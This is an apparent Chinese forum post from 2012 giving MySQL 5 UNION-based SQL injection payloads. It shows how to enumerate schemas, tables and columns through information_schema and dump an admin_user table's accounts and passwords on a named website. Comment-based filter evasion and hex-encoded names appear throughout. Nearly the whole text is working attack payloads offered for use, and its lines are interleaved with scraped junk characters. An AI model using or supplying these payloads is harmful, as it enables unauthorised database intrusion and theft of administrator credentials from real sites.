查库2 y- j3 i \1 b
/ N1 d. |/ J: M3 s; Did=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*. H: @& J7 B0 z! h
2 Y$ W* x# B* R查表
4 M0 u0 h+ N6 j3 ]+ c
. D& C5 Y& M5 j" Qid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
- n, P$ Z: F1 T* I8 _8 f3 }. e
; n& p6 H; K! q# C查段, y: [9 `4 o2 a1 K: d& P
! }1 U$ c' m9 i( e8 H8 R$ |8 Xid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1. P$ Z5 w9 y1 y$ r
5 t {/ D, W4 q! P; _* Z: w' M6 [
9 ]- K& X' F: A& Jmysql5高级注入方法暴表
# O( w; l f! f+ C v! s0 \" r
( s$ v7 g7 ^( b/ n' O例子如下:
$ h: E2 o' q0 r# V9 F
5 A! I8 e. U! ]9 C1 W) }' F1.爆表
3 _1 d! ~1 q2 h9 C. x$ A" F( Hhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
, M1 `9 i& W2 R3 w这样爆到第4个时出现了admin_user表。! `+ {! L- }. ]4 k9 [
/ ~8 |) x( V' H- \$ [, _; S2.暴字段
/ `+ a- s/ y7 }& n/ b/ zhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
# ~8 p4 n9 z* |& ~5 U
! ]$ I) y9 |* M
# }& _0 ]" s9 X! O3.爆密码
* O$ X4 M7 O% z) y3 Uhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* : F( e7 K* U l! f1 r8 k& Q8 f
- i1 ^0 X+ {, s5 L) ?3 j/ a! _$ e6 v$ M
|
发表于 2012-9-13 16:29:37
收藏
支持
反对